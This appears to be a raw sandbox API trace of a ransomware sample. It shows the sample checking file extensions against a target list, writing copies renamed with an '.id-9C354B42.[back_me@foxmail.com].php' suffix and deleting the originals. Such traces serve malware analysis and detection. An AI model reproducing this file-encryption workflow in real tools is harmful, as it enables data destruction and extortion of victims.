[0037.670] WriteFile (in: hFile=0x1e8, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.670] SetEndOfFile (hFile=0x1e8) returned 1 [0037.670] CloseHandle (hObject=0x1e8) returned 1 [0037.675] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.675] SetEndOfFile (hFile=0x1b0) returned 1 [0038.032] CloseHandle (hObject=0x1b0) returned 1 [0038.032] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0038.033] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0038.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.033] lstrlenW (lpString=".doc") returned 4 [0038.033] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.033] lstrlenW (lpString=".docx") returned 5 [0038.033] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0038.033] lstrlenW (lpString=".pdf") returned 4 [0038.033] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.033] lstrlenW (lpString=".xls") returned 4 [0038.033] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.033] lstrlenW (lpString=".xlsx") returned 5 [0038.033] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0038.033] lstrlenW (lpString=".ppt") returned 4 [0038.033] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.033] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.033] lstrlenW (lpString=".zip") returned 4 [0038.033] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.033] lstrlenW (lpString=".rar") returned 4 [0038.033] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.033] lstrlenW (lpString=".bz2") returned 4 [0038.033] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.033] lstrlenW (lpString=".7z") returned 3 [0038.033] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.034] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.034] lstrlenW (lpString=".dbf") returned 4 [0038.034] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.034] lstrlenW (lpString=".1cd") returned 4 [0038.034] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.034] lstrlenW (lpString=".jpg") returned 4 [0038.034] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.034] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.034] lstrlenW (lpString=".doc") returned 4 [0038.034] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString=".docx") returned 5 [0038.034] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0038.034] lstrlenW (lpString=".pdf") returned 4 [0038.034] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString=".xls") returned 4 [0038.034] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString=".xlsx") returned 5 [0038.034] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0038.034] lstrlenW (lpString=".ppt") returned 4 [0038.034] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.034] lstrlenW (lpString=".zip") returned 4 [0038.034] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.034] lstrlenW (lpString=".rar") returned 4 [0038.034] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString=".bz2") returned 4 [0038.034] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.034] lstrlenW (lpString=".7z") returned 3 [0038.035] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.035] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.035] lstrlenW (lpString=".dbf") returned 4 [0038.035] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.035] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.035] lstrlenW (lpString=".1cd") returned 4 [0038.035] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.035] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0038.035] lstrlenW (lpString=".jpg") returned 4 [0038.035] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.035] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0038.035] lstrlenW (lpString="boxed-join.avi") returned 14 [0038.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0039.445] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=33280) returned 1 [0039.445] CloseHandle (hObject=0x1b4) returned 1 [0039.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0039.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.445] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.445] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.445] lstrlenW (lpString=".doc") returned 4 [0039.446] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString=".docx") returned 5 [0039.446] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0039.446] lstrlenW (lpString=".pdf") returned 4 [0039.446] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString=".xls") returned 4 [0039.446] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString=".xlsx") returned 5 [0039.446] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0039.446] lstrlenW (lpString=".ppt") returned 4 [0039.446] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.446] lstrlenW (lpString=".zip") returned 4 [0039.446] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString=".rar") returned 4 [0039.446] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString=".bz2") returned 4 [0039.446] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString=".7z") returned 3 [0039.446] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.446] lstrlenW (lpString=".dbf") returned 4 [0039.446] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.446] lstrlenW (lpString=".1cd") returned 4 [0039.446] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.446] lstrlenW (lpString=".jpg") returned 4 [0039.446] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.447] lstrlenW (lpString=".doc") returned 4 [0039.447] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString=".docx") returned 5 [0039.447] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0039.447] lstrlenW (lpString=".pdf") returned 4 [0039.447] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString=".xls") returned 4 [0039.447] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString=".xlsx") returned 5 [0039.447] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0039.447] lstrlenW (lpString=".ppt") returned 4 [0039.447] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.447] lstrlenW (lpString=".zip") returned 4 [0039.447] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString=".rar") returned 4 [0039.447] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString=".bz2") returned 4 [0039.447] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString=".7z") returned 3 [0039.447] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.447] lstrlenW (lpString=".dbf") returned 4 [0039.447] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.447] lstrlenW (lpString=".1cd") returned 4 [0039.447] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0039.447] lstrlenW (lpString=".jpg") returned 4 [0039.447] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.448] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.448] lstrlenW (lpString="ipsdeu.xml") returned 10 [0039.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0039.515] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2616) returned 1 [0039.515] CloseHandle (hObject=0x1f0) returned 1 [0039.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml")) returned 0x20 [0039.515] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.515] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.515] lstrlenW (lpString=".doc") returned 4 [0039.515] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.515] lstrlenW (lpString=".docx") returned 5 [0039.515] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0039.516] lstrlenW (lpString=".pdf") returned 4 [0039.516] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString=".xls") returned 4 [0039.516] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString=".xlsx") returned 5 [0039.516] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0039.516] lstrlenW (lpString=".ppt") returned 4 [0039.516] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.516] lstrlenW (lpString=".zip") returned 4 [0039.516] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.516] lstrlenW (lpString=".rar") returned 4 [0039.516] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString=".bz2") returned 4 [0039.516] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString=".7z") returned 3 [0039.516] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.516] lstrlenW (lpString=".dbf") returned 4 [0039.516] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.516] lstrlenW (lpString=".1cd") returned 4 [0039.516] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.516] lstrlenW (lpString=".jpg") returned 4 [0039.516] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.516] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.516] lstrlenW (lpString=".doc") returned 4 [0039.516] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString=".docx") returned 5 [0039.517] lstrcmpiW (lpString1=".docx", lpString2="u.xml") returned -1 [0039.517] lstrlenW (lpString=".pdf") returned 4 [0039.517] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString=".xls") returned 4 [0039.517] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString=".xlsx") returned 5 [0039.517] lstrcmpiW (lpString1=".xlsx", lpString2="u.xml") returned -1 [0039.517] lstrlenW (lpString=".ppt") returned 4 [0039.517] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.517] lstrlenW (lpString=".zip") returned 4 [0039.517] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.517] lstrlenW (lpString=".rar") returned 4 [0039.517] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString=".bz2") returned 4 [0039.517] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString=".7z") returned 3 [0039.517] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.517] lstrlenW (lpString=".dbf") returned 4 [0039.517] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.517] lstrlenW (lpString=".1cd") returned 4 [0039.517] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.517] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdeu.xml") returned 61 [0039.517] lstrlenW (lpString=".jpg") returned 4 [0039.517] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.517] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.518] lstrlenW (lpString="ipsen.xml") returned 9 [0039.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.847] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2578) returned 1 [0039.847] CloseHandle (hObject=0x1b0) returned 1 [0039.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml")) returned 0x20 [0039.847] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.847] lstrlenW (lpString=".doc") returned 4 [0039.847] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.847] lstrlenW (lpString=".docx") returned 5 [0039.847] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0039.847] lstrlenW (lpString=".pdf") returned 4 [0039.847] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.847] lstrlenW (lpString=".xls") returned 4 [0039.847] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.847] lstrlenW (lpString=".xlsx") returned 5 [0039.847] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0039.847] lstrlenW (lpString=".ppt") returned 4 [0039.847] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString=".zip") returned 4 [0039.848] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.848] lstrlenW (lpString=".rar") returned 4 [0039.848] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString=".bz2") returned 4 [0039.848] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString=".7z") returned 3 [0039.848] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString=".dbf") returned 4 [0039.848] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString=".1cd") returned 4 [0039.848] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString=".jpg") returned 4 [0039.848] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString=".doc") returned 4 [0039.848] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString=".docx") returned 5 [0039.848] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0039.848] lstrlenW (lpString=".pdf") returned 4 [0039.848] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString=".xls") returned 4 [0039.848] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString=".xlsx") returned 5 [0039.848] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0039.848] lstrlenW (lpString=".ppt") returned 4 [0039.848] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.848] lstrlenW (lpString=".zip") returned 4 [0039.849] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.849] lstrlenW (lpString=".rar") returned 4 [0039.849] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.849] lstrlenW (lpString=".bz2") returned 4 [0039.849] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.849] lstrlenW (lpString=".7z") returned 3 [0039.849] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.849] lstrlenW (lpString=".dbf") returned 4 [0039.849] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.849] lstrlenW (lpString=".1cd") returned 4 [0039.849] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml") returned 60 [0039.849] lstrlenW (lpString=".jpg") returned 4 [0039.849] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.849] lstrcmpiW (lpString1=".HTM", lpString2=".php") returned -1 [0039.849] lstrlenW (lpString="README.HTM") returned 10 [0039.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.859] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1941) returned 1 [0039.859] CloseHandle (hObject=0x1b0) returned 1 [0039.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 0x20 [0039.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.859] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.859] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0039.861] GetLastError () returned 0x0 [0039.861] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x795, lpOverlapped=0x0) returned 1 [0039.865] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7a0, lpOverlapped=0x0) returned 1 [0039.866] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.866] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0039.866] 